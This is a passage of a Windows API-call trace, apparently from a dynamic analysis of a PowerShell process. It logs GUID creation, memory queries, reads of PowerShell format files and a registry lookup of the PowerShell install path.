	[0101.036] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xebc9cd66, Data2=0xb20e, Data3=0x4ef8, Data4=([0]=0x86, [1]=0x46, [2]=0x57, [3]=0x7f, [4]=0xc2, [5]=0x58, [6]=0x64, [7]=0xc1))) returned 0x0
	[0101.036] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.036] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe747c62d, Data2=0x27b2, Data3=0x4eb4, Data4=([0]=0xbf, [1]=0x52, [2]=0xf5, [3]=0x97, [4]=0x2f, [5]=0x87, [6]=0xec, [7]=0xea))) returned 0x0
	[0101.037] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.037] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.037] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.037] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.038] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x8bcd5dcb, Data2=0xa368, Data3=0x44f0, Data4=([0]=0x99, [1]=0xa, [2]=0x40, [3]=0x8f, [4]=0x6f, [5]=0x71, [6]=0xf7, [7]=0xe4))) returned 0x0
	[0101.038] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xda89f98c, Data2=0x9244, Data3=0x493d, Data4=([0]=0x9e, [1]=0xdc, [2]=0x4d, [3]=0x20, [4]=0x9e, [5]=0x36, [6]=0xa6, [7]=0x72))) returned 0x0
	[0101.039] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf40bbc57, Data2=0x7e1e, Data3=0x444f, Data4=([0]=0x80, [1]=0x71, [2]=0x72, [3]=0x10, [4]=0xec, [5]=0x6b, [6]=0x1b, [7]=0x4d))) returned 0x0
	[0101.039] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe6c65063, Data2=0x3b11, Data3=0x4db9, Data4=([0]=0x93, [1]=0xbc, [2]=0xe2, [3]=0x49, [4]=0xbe, [5]=0xb5, [6]=0x81, [7]=0xf9))) returned 0x0
	[0101.039] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xa2f1f491, Data2=0x9496, Data3=0x4b9d, Data4=([0]=0xbe, [1]=0x38, [2]=0xa5, [3]=0xe3, [4]=0xdb, [5]=0x5f, [6]=0x38, [7]=0x48))) returned 0x0
	[0101.039] VirtualQuery (in: lpAddress=0xec180, lpBuffer=0xed040, dwLength=0x30 | out: lpBuffer=0xed040*(BaseAddress=0xec000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.040] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xd9dd156e, Data2=0x2d8d, Data3=0x4014, Data4=([0]=0xa9, [1]=0x39, [2]=0xdb, [3]=0xea, [4]=0x35, [5]=0x24, [6]=0x87, [7]=0x30))) returned 0x0
	[0101.040] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xc1304ac5, Data2=0x706e, Data3=0x4777, Data4=([0]=0x85, [1]=0x40, [2]=0xdd, [3]=0x4f, [4]=0x67, [5]=0xff, [6]=0x2f, [7]=0x65))) returned 0x0
	[0101.040] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xf5f1c6db, Data2=0x32e0, Data3=0x41df, Data4=([0]=0xb0, [1]=0xb7, [2]=0x38, [3]=0x76, [4]=0xf5, [5]=0x75, [6]=0xe3, [7]=0x12))) returned 0x0
	[0101.040] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x29dc14b6, Data2=0xc53a, Data3=0x403c, Data4=([0]=0x99, [1]=0x95, [2]=0x2, [3]=0x88, [4]=0xd8, [5]=0xc, [6]=0x65, [7]=0xd9))) returned 0x0
	[0101.041] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x66291ae7, Data2=0xd629, Data3=0x4d90, Data4=([0]=0xb1, [1]=0x84, [2]=0xfc, [3]=0xb7, [4]=0x19, [5]=0xc, [6]=0x21, [7]=0xa0))) returned 0x0
	[0101.041] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2b4fd7fa, Data2=0x491c, Data3=0x452b, Data4=([0]=0x8b, [1]=0x4a, [2]=0x6b, [3]=0xc1, [4]=0x43, [5]=0xc3, [6]=0x29, [7]=0x52))) returned 0x0
	[0101.041] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x7fa15b9e, Data2=0x59ba, Data3=0x4d46, Data4=([0]=0xaf, [1]=0x33, [2]=0xfb, [3]=0x85, [4]=0xfc, [5]=0xfc, [6]=0x71, [7]=0xcd))) returned 0x0
	[0101.041] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x4fae3108, Data2=0x9e3c, Data3=0x4417, Data4=([0]=0xa9, [1]=0xef, [2]=0x5a, [3]=0xe9, [4]=0x62, [5]=0xde, [6]=0xf, [7]=0x9f))) returned 0x0
	[0101.042] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x45195b7, Data2=0x4517, Data3=0x48ca, Data4=([0]=0xb3, [1]=0x54, [2]=0x5d, [3]=0x30, [4]=0xfe, [5]=0x5c, [6]=0x88, [7]=0xe9))) returned 0x0
	[0101.042] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xac152dc4, Data2=0x5c29, Data3=0x4c32, Data4=([0]=0x8f, [1]=0x59, [2]=0x79, [3]=0xeb, [4]=0xad, [5]=0xbb, [6]=0xe5, [7]=0xf3))) returned 0x0
	[0101.042] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2ceb25b9, Data2=0xf6c4, Data3=0x4521, Data4=([0]=0x9b, [1]=0xc5, [2]=0x3e, [3]=0x84, [4]=0xa, [5]=0xae, [6]=0x8a, [7]=0xdb))) returned 0x0
	[0101.042] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x856a6069, Data2=0x8118, Data3=0x4b9f, Data4=([0]=0x92, [1]=0x77, [2]=0xaa, [3]=0xff, [4]=0x84, [5]=0x44, [6]=0xd4, [7]=0x66))) returned 0x0
	[0101.043] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2c51268a, Data2=0x1037, Data3=0x4797, Data4=([0]=0xbd, [1]=0xd7, [2]=0xad, [3]=0x5d, [4]=0xfb, [5]=0x11, [6]=0x9b, [7]=0x6f))) returned 0x0
	[0101.043] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x84dce9d8, Data2=0x51fd, Data3=0x49da, Data4=([0]=0x8b, [1]=0xdc, [2]=0x23, [3]=0x10, [4]=0x25, [5]=0x3c, [6]=0x9f, [7]=0xd6))) returned 0x0
	[0101.043] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x8ce78114, Data2=0x78ac, Data3=0x4d5a, Data4=([0]=0xbc, [1]=0x67, [2]=0x6e, [3]=0x52, [4]=0x5, [5]=0x92, [6]=0xbf, [7]=0x56))) returned 0x0
	[0101.043] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x2b60facb, Data2=0x5d2, Data3=0x4b50, Data4=([0]=0x96, [1]=0x45, [2]=0xe5, [3]=0x5c, [4]=0xee, [5]=0x7d, [6]=0x2e, [7]=0x7))) returned 0x0
	[0101.043] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x3cf44625, Data2=0x3ea3, Data3=0x4263, Data4=([0]=0xbf, [1]=0xac, [2]=0x5a, [3]=0x90, [4]=0x38, [5]=0x1e, [6]=0xcd, [7]=0x83))) returned 0x0
	[0101.044] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x114a943, Data2=0x168f, Data3=0x4561, Data4=([0]=0xa7, [1]=0xa9, [2]=0xcc, [3]=0xa3, [4]=0xab, [5]=0x4, [6]=0x2c, [7]=0x9b))) returned 0x0
	[0101.044] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x37e258b7, Data2=0x7a2a, Data3=0x46aa, Data4=([0]=0xbe, [1]=0x25, [2]=0x7f, [3]=0x6d, [4]=0x95, [5]=0xa0, [6]=0x51, [7]=0x89))) returned 0x0
	[0101.044] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.044] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.045] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.046] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xbd1ae824, Data2=0x79d0, Data3=0x48da, Data4=([0]=0x97, [1]=0xf4, [2]=0x64, [3]=0x19, [4]=0x1d, [5]=0xa1, [6]=0x2e, [7]=0xaa))) returned 0x0
	[0101.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0101.047] SetErrorMode (uMode=0x1) returned 0x1
	[0101.047] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0101.047] GetFileType (hFile=0x334) returned 0x1
	[0101.047] SetErrorMode (uMode=0x1) returned 0x1
	[0101.047] GetFileType (hFile=0x334) returned 0x1
	[0101.047] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.048] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.049] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.049] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.050] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.050] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.050] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x119, lpOverlapped=0x0) returned 1
	[0101.050] ReadFile (in: hFile=0x334, lpBuffer=0x3536858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x3536858*, lpNumberOfBytesRead=0xed258*=0x0, lpOverlapped=0x0) returned 1
	[0101.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0101.051] SetErrorMode (uMode=0x1) returned 0x1
	[0101.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xed200 | out: lpFileInformation=0xed200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0101.051] SetErrorMode (uMode=0x1) returned 0x1
	[0101.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0101.051] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2e8 | out: phkResult=0xed2e8*=0x334) returned 0x0
	[0101.052] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed26c, lpData=0x0, lpcbData=0xed268*=0x0 | out: lpType=0xed26c*=0x1, lpData=0x0, lpcbData=0xed268*=0x56) returned 0x0
	[0101.052] CoTaskMemAlloc (cb=0x5a) returned 0x28a760
	[0101.052] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed23c, lpData=0x28a760, lpcbData=0xed238*=0x56 | out: lpType=0xed23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed238*=0x56) returned 0x0
	[0101.052] CoTaskMemFree (pv=0x28a760) 
	[0101.052] RegCloseKey (hKey=0x334) returned 0x0
	[0101.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0101.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0101.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.054] VirtualQuery (in: lpAddress=0xebd80, lpBuffer=0xecc40, dwLength=0x30 | out: lpBuffer=0xecc40*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.055] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x1adab8ee, Data2=0xd560, Data3=0x4d68, Data4=([0]=0x81, [1]=0x1c, [2]=0xce, [3]=0x1b, [4]=0x1a, [5]=0x3d, [6]=0x68, [7]=0xb1))) returned 0x0
	[0101.055] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.055] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xdc46bd5d, Data2=0x15f1, Data3=0x4d48, Data4=([0]=0xad, [1]=0x40, [2]=0x38, [3]=0xe9, [4]=0xe5, [5]=0x10, [6]=0x14, [7]=0x48))) returned 0x0
	[0101.056] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xe689e767, Data2=0xc46c, Data3=0x45b8, Data4=([0]=0x99, [1]=0xd9, [2]=0xfe, [3]=0xde, [4]=0xb4, [5]=0x78, [6]=0x21, [7]=0x96))) returned 0x0
	[0101.056] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0xd8590a15, Data2=0x1075, Data3=0x47b7, Data4=([0]=0x85, [1]=0xf1, [2]=0x47, [3]=0x24, [4]=0x54, [5]=0x3a, [6]=0x67, [7]=0x17))) returned 0x0
	[0101.056] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.056] VirtualQuery (in: lpAddress=0xebec0, lpBuffer=0xecd80, dwLength=0x30 | out: lpBuffer=0xecd80*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0101.057] SetErrorMode (uMode=0x1) returned 0x1
	[0101.057] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0101.057] GetFileType (hFile=0x334) returned 0x1
	[0101.057] SetErrorMode (uMode=0x1) returned 0x1
	[0101.057] GetFileType (hFile=0x334) returned 0x1
	[0101.057] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.142] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.143] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.143] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.144] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.144] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.144] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.144] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.145] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.145] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.146] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.146] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.146] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.146] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.147] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.147] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.149] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.149] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.150] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.150] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.150] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.150] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.151] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
	[0101.151] ReadFile (in: hFile=0x334, lpBuffer=0x35929f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed258, lpOverlapped=0x0 | out: lpBuffer=0x35929f8*, lpNumberOfBytesRead=0xed258*=0x1000, lpOverlapped=0x0) returned 1
